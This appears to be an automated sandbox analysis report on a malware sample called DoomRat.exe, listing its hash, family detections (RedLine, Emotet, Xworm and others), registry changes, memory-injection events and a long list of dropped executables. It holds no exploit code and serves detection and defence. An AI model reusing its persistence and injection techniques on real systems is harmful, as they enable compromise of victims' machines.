Malware Analysis Report

2024-11-13 18:11

Sample ID 240920-v11kdayaqd
Target DoomRat.exe
SHA256 94bd1fa65b9ee3fe4be830326ebcd918609ee260797391d1af8aa4ac470cce3f
Tags
pyinstaller adware antivm apt backdoor banker bootkit botnet clipper collection crypter discovery downloader dropper evasion exploit exploiter fakeav ics infostealer keylogger loader maldoc miner overlay persistence ransomware rat rootkit spam spreader spyware stealer trojan wiper worm doomrat berbew blackmoon emotet modiloader redline sectoprat xworm @tankist1007 epoch2 backdoor banker discovery execution infostealer rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

94bd1fa65b9ee3fe4be830326ebcd918609ee260797391d1af8aa4ac470cce3f

Threat Level: Known bad

The file DoomRat.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller adware antivm apt backdoor banker bootkit botnet clipper collection crypter discovery downloader dropper evasion exploit exploiter fakeav ics infostealer keylogger loader maldoc miner overlay persistence ransomware rat rootkit spam spreader spyware stealer trojan wiper worm doomrat berbew blackmoon emotet modiloader redline sectoprat xworm @tankist1007 epoch2 backdoor banker discovery execution infostealer rat trojan upx

DoomRatV2

Blackmoon, KrBanker

SectopRAT

Xworm

Detect Blackmoon payload

Berbew

Detect Xworm Payload

ModiLoader, DBatLoader

Emotet

SectopRAT payload

RedLine payload

Doomrat family

RedLine

ModiLoader Second Stage

Emotet payload

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Program crash

Detects Pyinstaller

System Location Discovery: System Language Discovery

Unsigned PE

NSIS installer

Modifies registry key

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-20 17:28

Signatures

DoomRatV2

adware antivm apt backdoor banker bootkit botnet clipper collection crypter discovery downloader dropper evasion exploit exploiter fakeav ics infostealer keylogger loader maldoc miner overlay persistence ransomware rat rootkit spam spreader spyware stealer trojan wiper worm
Description Indicator Process Target
N/A N/A N/A N/A

Doomrat family

doomrat

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-20 17:28

Reported

2024-09-20 17:30

Platform

win10-20240404-en

Max time kernel

5s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DoomRat.exe"

Signatures

Berbew

backdoor berbew

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Emotet

trojan banker emotet

ModiLoader, DBatLoader

trojan modiloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Emotet payload

trojan banker
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A
N/A ip-api.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\240920-vxvvqaxhmf6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738} C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Homcpd32.dll" C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4372 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\AppData\Local\Temp\DoomRat.exe
PID 4372 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\AppData\Local\Temp\DoomRat.exe
PID 2328 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Windows\system32\cmd.exe
PID 2328 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Windows\system32\cmd.exe
PID 2328 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe
PID 2328 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe
PID 2328 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe
PID 2328 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\Downloads\240920-vxvvqaxhmf6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9N.exe
PID 2328 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\Downloads\240920-vxvvqaxhmf6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9N.exe
PID 2328 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Users\Admin\Downloads\240920-vxvvqaxhmf6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9N.exe
PID 2328 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Windows\SysWOW64\Knkekn32.exe
PID 2328 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Windows\SysWOW64\Knkekn32.exe
PID 2328 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\DoomRat.exe C:\Windows\SysWOW64\Knkekn32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\DoomRat.exe

"C:\Users\Admin\AppData\Local\Temp\DoomRat.exe"

C:\Users\Admin\AppData\Local\Temp\DoomRat.exe

"C:\Users\Admin\AppData\Local\Temp\DoomRat.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vxvvqaxhmf6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9N.exe

C:\Users\Admin\Downloads\240920-vxvvqaxhmf6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9N.exe

C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe

C:\Users\Admin\Downloads\240920-vv97maybpnfa1c6341a47ceafb1e766771bb386e75b54bb5568fb9ee09c6181193dec65254N.exe

C:\Windows\SysWOW64\Mgkjhe32.exe

C:\Windows\system32\Mgkjhe32.exe

C:\Windows\SysWOW64\Mgkjhe32.exe

C:\Windows\system32\Mgkjhe32.exe

C:\Windows\SysWOW64\Npcoakfp.exe

C:\Windows\system32\Npcoakfp.exe

C:\Windows\SysWOW64\Nepgjaeg.exe

C:\Windows\system32\Nepgjaeg.exe

C:\Windows\SysWOW64\Nilcjp32.exe

C:\Windows\system32\Nilcjp32.exe

C:\Users\Admin\Downloads\240920-vs8k1syaqrAimwareCrack.exe

C:\Users\Admin\Downloads\240920-vs8k1syaqrAimwareCrack.exe

C:\Windows\SysWOW64\Ncfdie32.exe

C:\Windows\system32\Ncfdie32.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\240920-vvkxqsybmjLifenz Performance Utility.bat""

C:\Users\Admin\Downloads\240920-vxs15aycmj71abdf77da55881a2f1ebf1c4ba31764d0abb5da006e377eb8befe468b242d6eN.exe

C:\Users\Admin\Downloads\240920-vxs15aycmj71abdf77da55881a2f1ebf1c4ba31764d0abb5da006e377eb8befe468b242d6eN.exe

C:\Windows\SysWOW64\Aqppkd32.exe

C:\Windows\system32\Aqppkd32.exe

C:\Users\Admin\Downloads\240920-vse9gaxfjcee0ff28225ac3cc3ed314fd17f448877_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vse9gaxfjcee0ff28225ac3cc3ed314fd17f448877_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vwvhkaxgrbd775c2daf922ab14adacbe4c5157a5750477160fe1b6569d3e4c5831f9ae80a2N.exe

C:\Users\Admin\Downloads\240920-vwvhkaxgrbd775c2daf922ab14adacbe4c5157a5750477160fe1b6569d3e4c5831f9ae80a2N.exe

C:\Users\Admin\Downloads\240920-vp7jjsxdrcee0e6d5d83177385528a84b22b7cca32_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vp7jjsxdrcee0e6d5d83177385528a84b22b7cca32_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe

"C:\Users\Admin\Downloads\240920-vy6cvaydkjee1469577de60f9c1ad217cd69946321_JaffaCakes118.exe"

C:\Windows\SysWOW64\Bmngqdpj.exe

C:\Windows\system32\Bmngqdpj.exe

C:\Windows\SysWOW64\Baicac32.exe

C:\Windows\system32\Baicac32.exe

C:\Users\Admin\Downloads\240920-t5an3swekf4b8ddee83ddb0f8d45a8f783403874a11242b816adf2393e89611a3178b359e3N.exe

C:\Users\Admin\Downloads\240920-t5an3swekf4b8ddee83ddb0f8d45a8f783403874a11242b816adf2393e89611a3178b359e3N.exe

C:\Users\Admin\Downloads\240920-vpr4vsxdpgba291dad61ad1814abd1fa947848b77090c9d8a857a8e3caa98f2edd4e766d0aN.exe

C:\Users\Admin\Downloads\240920-vpr4vsxdpgba291dad61ad1814abd1fa947848b77090c9d8a857a8e3caa98f2edd4e766d0aN.exe

C:\Windows\SysWOW64\Bjagjhnc.exe

C:\Windows\system32\Bjagjhnc.exe

C:\Windows\SysWOW64\Bjddphlq.exe

C:\Windows\system32\Bjddphlq.exe

C:\Windows\SysWOW64\Banllbdn.exe

C:\Windows\system32\Banllbdn.exe

C:\Users\Admin\Downloads\240920-vbkgvswgpdee04cc9b797c4113999f764febf3661d_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vbkgvswgpdee04cc9b797c4113999f764febf3661d_JaffaCakes118.exe

C:\Windows\SysWOW64\Bmbplc32.exe

C:\Windows\system32\Bmbplc32.exe

C:\Windows\SysWOW64\Bmbplc32.exe

C:\Windows\system32\Bmbplc32.exe

C:\Windows\SysWOW64\Bapiabak.exe

C:\Windows\system32\Bapiabak.exe

C:\Windows\SysWOW64\Bcoenmao.exe

C:\Windows\system32\Bcoenmao.exe

C:\Users\Admin\Downloads\240920-t9tyhsxbkn79aff7cdae3bbfc10511199876f12557c6f6aafcae36bc41c8e572a804f38e3aN.exe

C:\Users\Admin\Downloads\240920-t9tyhsxbkn79aff7cdae3bbfc10511199876f12557c6f6aafcae36bc41c8e572a804f38e3aN.exe

C:\Windows\SysWOW64\Chmndlge.exe

C:\Windows\system32\Chmndlge.exe

C:\Windows\SysWOW64\Cjkjpgfi.exe

C:\Windows\system32\Cjkjpgfi.exe

C:\Windows\SysWOW64\Cmiflbel.exe

C:\Windows\system32\Cmiflbel.exe

C:\Windows\SysWOW64\Caebma32.exe

C:\Windows\system32\Caebma32.exe

C:\Users\Admin\Downloads\240920-vrftlsxendee0f3c7d69bdc0378ebb3538ab77f546_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vrftlsxendee0f3c7d69bdc0378ebb3538ab77f546_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vx5pxsycnqd3f3df227a28095b52ed9ede58fbd727c855505e0b82a599f2988d18cd49f9edN.exe

C:\Users\Admin\Downloads\240920-vx5pxsycnqd3f3df227a28095b52ed9ede58fbd727c855505e0b82a599f2988d18cd49f9edN.exe

C:\Windows\SysWOW64\Cmnpgb32.exe

C:\Windows\system32\Cmnpgb32.exe

C:\Windows\SysWOW64\Cmnpgb32.exe

C:\Windows\system32\Cmnpgb32.exe

C:\Users\Admin\Downloads\240920-t7cw8awfjgee01df168b486ee9a52fd7297b6daeca_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t7cw8awfjgee01df168b486ee9a52fd7297b6daeca_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vbabwsxbqq9d3bf20e397d7b6a2eda273631d149c4cfda29b1b3a8db960fbfad19c74a29b7N.exe

C:\Users\Admin\Downloads\240920-vbabwsxbqq9d3bf20e397d7b6a2eda273631d149c4cfda29b1b3a8db960fbfad19c74a29b7N.exe

C:\Users\Admin\Downloads\240920-vtswysxfnb64fc7c04296bf5bf8f4cf5f8ef53454b57f10fbe6cbecd7537c9e0281525fe34N.exe

C:\Users\Admin\Downloads\240920-vtswysxfnb64fc7c04296bf5bf8f4cf5f8ef53454b57f10fbe6cbecd7537c9e0281525fe34N.exe

C:\Windows\SysWOW64\Chcddk32.exe

C:\Windows\system32\Chcddk32.exe

C:\Windows\SysWOW64\Cjbpaf32.exe

C:\Windows\system32\Cjbpaf32.exe

C:\Windows\SysWOW64\Ddjejl32.exe

C:\Windows\system32\Ddjejl32.exe

C:\Windows\SysWOW64\Dhfajjoj.exe

C:\Windows\system32\Dhfajjoj.exe

C:\Users\Admin\Downloads\240920-vfj2wsxdnja5a6a3cf0e2584b74735643acfc439d7e0f33060ae0dbc6ce82c8b0873c43b36N.exe

C:\Users\Admin\Downloads\240920-vfj2wsxdnja5a6a3cf0e2584b74735643acfc439d7e0f33060ae0dbc6ce82c8b0873c43b36N.exe

C:\Windows\SysWOW64\Danecp32.exe

C:\Windows\system32\Danecp32.exe

C:\Windows\SysWOW64\Djgjlelk.exe

C:\Windows\system32\Djgjlelk.exe

C:\Windows\SysWOW64\Ddmaok32.exe

C:\Windows\system32\Ddmaok32.exe

C:\Windows\SysWOW64\Daconoae.exe

C:\Windows\system32\Daconoae.exe

C:\Windows\SysWOW64\Deokon32.exe

C:\Windows\system32\Deokon32.exe

C:\Users\Admin\Downloads\240920-vslq9ayanlcf22c405ddcc8f804167827b4a4e678f210a3dff1d08446520b766d1c62d84b1N.exe

C:\Users\Admin\Downloads\240920-vslq9ayanlcf22c405ddcc8f804167827b4a4e678f210a3dff1d08446520b766d1c62d84b1N.exe

C:\Windows\SysWOW64\Dknpmdfc.exe

C:\Windows\system32\Dknpmdfc.exe

C:\Windows\SysWOW64\Edfdej32.exe

C:\Windows\system32\Edfdej32.exe

C:\Windows\SysWOW64\Ehapfiem.exe

C:\Windows\system32\Ehapfiem.exe

C:\Windows\SysWOW64\Delnin32.exe

C:\Windows\system32\Delnin32.exe

C:\Windows\SysWOW64\Emoinpcd.exe

C:\Windows\system32\Emoinpcd.exe

C:\Users\Admin\Downloads\240920-t5rycswemc52d21083c94c29f0d173d9a211530d782dae1bde711378213c0847a1530fb231N.exe

C:\Users\Admin\Downloads\240920-t5rycswemc52d21083c94c29f0d173d9a211530d782dae1bde711378213c0847a1530fb231N.exe

C:\Windows\SysWOW64\Cmnpgb32.exe

C:\Windows\system32\Cmnpgb32.exe

C:\Users\Admin\Downloads\240920-vse9gaxfjcee0ff28225ac3cc3ed314fd17f448877_JaffaCakes118.exe

--153e7b57

C:\Windows\SysWOW64\Hofmfmhj.exe

C:\Windows\system32\Hofmfmhj.exe

C:\Windows\SysWOW64\Hninbj32.exe

C:\Windows\system32\Hninbj32.exe

C:\Users\Admin\Downloads\240920-vnpbksxdkh9c2783dff1310896bde24cd9dfde62b7fc37dd14a1fc22872937df56a174b9c0N.exe

C:\Users\Admin\Downloads\240920-vnpbksxdkh9c2783dff1310896bde24cd9dfde62b7fc37dd14a1fc22872937df56a174b9c0N.exe

C:\Users\Admin\Downloads\240920-vcrybswhkc0a70692275be31f3b79f781c49503b3fe20d0e05716d2237987f59009dbf040cN.exe

C:\Users\Admin\Downloads\240920-vcrybswhkc0a70692275be31f3b79f781c49503b3fe20d0e05716d2237987f59009dbf040cN.exe

C:\Windows\SysWOW64\Hkmnln32.exe

C:\Windows\system32\Hkmnln32.exe

C:\Users\Admin\Downloads\240920-t5d2hawhljTrojanDownloader.Win32.Berbew.pz-9930686c6477c63827271b427cfc8f13337e8b58917b2a364f1a08e590d426fbN

C:\Users\Admin\Downloads\240920-t5d2hawhljTrojanDownloader.Win32.Berbew.pz-9930686c6477c63827271b427cfc8f13337e8b58917b2a364f1a08e590d426fbN

C:\Windows\SysWOW64\Ibffhhek.exe

C:\Windows\system32\Ibffhhek.exe

C:\Windows\SysWOW64\Inkjhi32.exe

C:\Windows\system32\Inkjhi32.exe

C:\Windows\SysWOW64\Ikokan32.exe

C:\Windows\system32\Ikokan32.exe

C:\Users\Admin\Downloads\240920-vkvn7axfnqee0b50bfe58e4bbbc51343ad57ad7700_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vkvn7axfnqee0b50bfe58e4bbbc51343ad57ad7700_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vp9znsxhmn7898585844d414d11f31628aea380af8a9ce79bdd91a54e52414c51869ba103fN.exe

C:\Users\Admin\Downloads\240920-vp9znsxhmn7898585844d414d11f31628aea380af8a9ce79bdd91a54e52414c51869ba103fN.exe

C:\Windows\SysWOW64\Ikaggmii.exe

C:\Windows\system32\Ikaggmii.exe

C:\Windows\SysWOW64\Iomcgl32.exe

C:\Windows\system32\Iomcgl32.exe

C:\Users\Admin\Downloads\240920-vpyxeaxhlnee0e4ea73bb1db835b27ae6abfc8b807_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vpyxeaxhlnee0e4ea73bb1db835b27ae6abfc8b807_JaffaCakes118.exe

C:\Windows\SysWOW64\Ifgldfio.exe

C:\Windows\system32\Ifgldfio.exe

C:\Windows\SysWOW64\Iiehpahb.exe

C:\Windows\system32\Iiehpahb.exe

C:\Users\Admin\Downloads\240920-vdttbaxcppc0b27aa7a206873bc989da87b4a1d0ede5b93932f6a249f179c31d6662b9a0dbN.exe

C:\Users\Admin\Downloads\240920-vdttbaxcppc0b27aa7a206873bc989da87b4a1d0ede5b93932f6a249f179c31d6662b9a0dbN.exe

C:\Users\Admin\Downloads\240920-vkvn7axfnqee0b50bfe58e4bbbc51343ad57ad7700_JaffaCakes118.exe

--728b80b8

C:\Windows\SysWOW64\Kiaqcnpb.exe

C:\Windows\system32\Kiaqcnpb.exe

C:\Windows\SysWOW64\Kiaqcnpb.exe

C:\Windows\system32\Kiaqcnpb.exe

C:\Windows\SysWOW64\Lhdqnj32.exe

C:\Windows\system32\Lhdqnj32.exe

C:\Windows\SysWOW64\Lhdqnj32.exe

C:\Windows\system32\Lhdqnj32.exe

C:\Windows\SysWOW64\Llpmoiof.exe

C:\Windows\system32\Llpmoiof.exe

C:\Windows\SysWOW64\Llpmoiof.exe

C:\Windows\system32\Llpmoiof.exe

C:\Windows\SysWOW64\Lpkiph32.exe

C:\Windows\system32\Lpkiph32.exe

C:\Users\Admin\Downloads\240920-t9bryaxarn2b6160b66405385d5d51d75797ca7ae758aaedf5c64e5399cda89dcaf3c68c32N.exe

C:\Users\Admin\Downloads\240920-t9bryaxarn2b6160b66405385d5d51d75797ca7ae758aaedf5c64e5399cda89dcaf3c68c32N.exe

C:\Windows\SysWOW64\Lpneegel.exe

C:\Windows\system32\Lpneegel.exe

C:\Users\Admin\Downloads\240920-vxethaxhkh6e5376dc7fe62ddf9b4b1eddf1f00de569c76560fe9235d36a16a3c25d989c76N.exe

C:\Users\Admin\Downloads\240920-vxethaxhkh6e5376dc7fe62ddf9b4b1eddf1f00de569c76560fe9235d36a16a3c25d989c76N.exe

C:\Windows\SysWOW64\Lifjnm32.exe

C:\Windows\system32\Lifjnm32.exe

C:\Windows\SysWOW64\Lldfjh32.exe

C:\Windows\system32\Lldfjh32.exe

C:\Windows\SysWOW64\Lppbkgcj.exe

C:\Windows\system32\Lppbkgcj.exe

C:\Users\Admin\Downloads\240920-vt4nfsxfreee118201674e897c181b8fc82c7c9cb0_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vt4nfsxfreee118201674e897c181b8fc82c7c9cb0_JaffaCakes118.exe

C:\Windows\SysWOW64\Loeolc32.exe

C:\Windows\system32\Loeolc32.exe

C:\Windows\SysWOW64\Lflgmqhd.exe

C:\Windows\system32\Lflgmqhd.exe

C:\Windows\SysWOW64\Leoghn32.exe

C:\Windows\system32\Leoghn32.exe

C:\Windows\SysWOW64\Lpekef32.exe

C:\Windows\system32\Lpekef32.exe

C:\Windows\SysWOW64\Mpghkf32.exe

C:\Windows\system32\Mpghkf32.exe

C:\Users\Admin\Downloads\240920-vwxb6aybrrTrojan.Win32.Cerber.pz-0a11143a8afd4e72f346a55d2f84ecf9b1682f55b24b12a75aad5eac70dd6c94N

C:\Users\Admin\Downloads\240920-vwxb6aybrrTrojan.Win32.Cerber.pz-0a11143a8afd4e72f346a55d2f84ecf9b1682f55b24b12a75aad5eac70dd6c94N

C:\Windows\SysWOW64\Molelb32.exe

C:\Windows\system32\Molelb32.exe

C:\Windows\SysWOW64\Molelb32.exe

C:\Windows\system32\Molelb32.exe

C:\Windows\SysWOW64\Molelb32.exe

C:\Windows\system32\Molelb32.exe

C:\Users\Admin\Downloads\240920-vrl1mayajm81756bd83e11ef76fb7e65f53c3f6513bab8aead0d9908bda1bb945c81cb5cafN.exe

C:\Users\Admin\Downloads\240920-vrl1mayajm81756bd83e11ef76fb7e65f53c3f6513bab8aead0d9908bda1bb945c81cb5cafN.exe

C:\Windows\SysWOW64\Moobbb32.exe

C:\Windows\system32\Moobbb32.exe

C:\Windows\SysWOW64\Mlbbkfoq.exe

C:\Windows\system32\Mlbbkfoq.exe

C:\Windows\SysWOW64\Mpnnle32.exe

C:\Windows\system32\Mpnnle32.exe

C:\Windows\SysWOW64\Moaogand.exe

C:\Windows\system32\Moaogand.exe

\??\c:\046604.exe

c:\046604.exe

C:\Windows\SysWOW64\Mhicpg32.exe

C:\Windows\system32\Mhicpg32.exe

\??\c:\windows\system\explorer.exe

c:\windows\system\explorer.exe

C:\Windows\SysWOW64\Mbognp32.exe

C:\Windows\system32\Mbognp32.exe

C:\Windows\SysWOW64\Nemcjk32.exe

C:\Windows\system32\Nemcjk32.exe

C:\Windows\SysWOW64\Noehba32.exe

C:\Windows\system32\Noehba32.exe

C:\Users\Admin\Downloads\240920-vwy6raycjl92831659ff292161ce3a6c75273e7649c875f2ef63c6b9714159b325cb927357N.exe

C:\Users\Admin\Downloads\240920-vwy6raycjl92831659ff292161ce3a6c75273e7649c875f2ef63c6b9714159b325cb927357N.exe

C:\Windows\SysWOW64\Niklpj32.exe

C:\Windows\system32\Niklpj32.exe

C:\Windows\SysWOW64\Ngomin32.exe

C:\Windows\system32\Ngomin32.exe

\??\c:\8282822.exe

c:\8282822.exe

C:\Windows\SysWOW64\Qjnkcekm.exe

C:\Windows\system32\Qjnkcekm.exe

C:\Windows\SysWOW64\Qjnkcekm.exe

C:\Windows\system32\Qjnkcekm.exe

C:\Windows\SysWOW64\Qhakoa32.exe

C:\Windows\system32\Qhakoa32.exe

C:\Windows\SysWOW64\Qhakoa32.exe

C:\Windows\system32\Qhakoa32.exe

\??\c:\s0464.exe

c:\s0464.exe

C:\Windows\SysWOW64\Ajeadd32.exe

C:\Windows\system32\Ajeadd32.exe

C:\Windows\SysWOW64\winsku\KBDYCL.exe

"C:\Windows\SysWOW64\winsku\KBDYCL.exe"

C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe

C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\temp\201153135239.exe

"C:\Windows\temp\201153135239.exe"

C:\Windows\SysWOW64\Bjfjka32.exe

C:\Windows\system32\Bjfjka32.exe

C:\Users\Admin\Downloads\240920-vlbbyaxcjhee0ba09af8a44fbaf785252c806de6af_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vlbbyaxcjhee0ba09af8a44fbaf785252c806de6af_JaffaCakes118.exe

C:\Windows\SysWOW64\Caghhk32.exe

C:\Windows\system32\Caghhk32.exe

C:\Users\Admin\meeguf.exe

"C:\Users\Admin\meeguf.exe"

C:\Windows\SysWOW64\Cgqqdeod.exe

C:\Windows\system32\Cgqqdeod.exe

\??\c:\260082.exe

c:\260082.exe

C:\Users\Admin\Downloads\240920-vmrejsxglpf959c99a2e9c1a43d3e8489efe6a5b7d0668e7bc4abacee4b9d14c02eeb6a2bcN.exe

C:\Users\Admin\Downloads\240920-vmrejsxglpf959c99a2e9c1a43d3e8489efe6a5b7d0668e7bc4abacee4b9d14c02eeb6a2bcN.exe

C:\Users\Admin\Downloads\240920-vv7fqsybpk5c80cae387b7451a3327695da1ff52b082aa48c68f1f1ecb662bbff276ab1b9aN.exe

C:\Users\Admin\Downloads\240920-vv7fqsybpk5c80cae387b7451a3327695da1ff52b082aa48c68f1f1ecb662bbff276ab1b9aN.exe

C:\Users\Admin\Downloads\240920-vmmflaxgljee0c8e16ef522ff0c01b5687a9ac3ebd_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vmmflaxgljee0c8e16ef522ff0c01b5687a9ac3ebd_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vt18bsxfpfb831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe

C:\Users\Admin\Downloads\240920-vt18bsxfpfb831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe

C:\Users\Admin\Downloads\240920-vvs84sybmpfc9e7f26890392ed717c463d18f9ff5dd62831477f1999b1396560e307776a75N.exe

C:\Users\Admin\Downloads\240920-vvs84sybmpfc9e7f26890392ed717c463d18f9ff5dd62831477f1999b1396560e307776a75N.exe

C:\Users\Admin\Downloads\240920-vmkl1axgkr77164e0451cbb694eb4393235f70d97315a0a87c3b49955c284299d6c240b6aaN.exe

C:\Users\Admin\Downloads\240920-vmkl1axgkr77164e0451cbb694eb4393235f70d97315a0a87c3b49955c284299d6c240b6aaN.exe

C:\Users\Admin\Downloads\240920-vzqnsayalaad9859509db71be620c6348140b6ca6a3594d95ceaba8a0cafd3ec2d23e899ecN.exe

C:\Users\Admin\Downloads\240920-vzqnsayalaad9859509db71be620c6348140b6ca6a3594d95ceaba8a0cafd3ec2d23e899ecN.exe

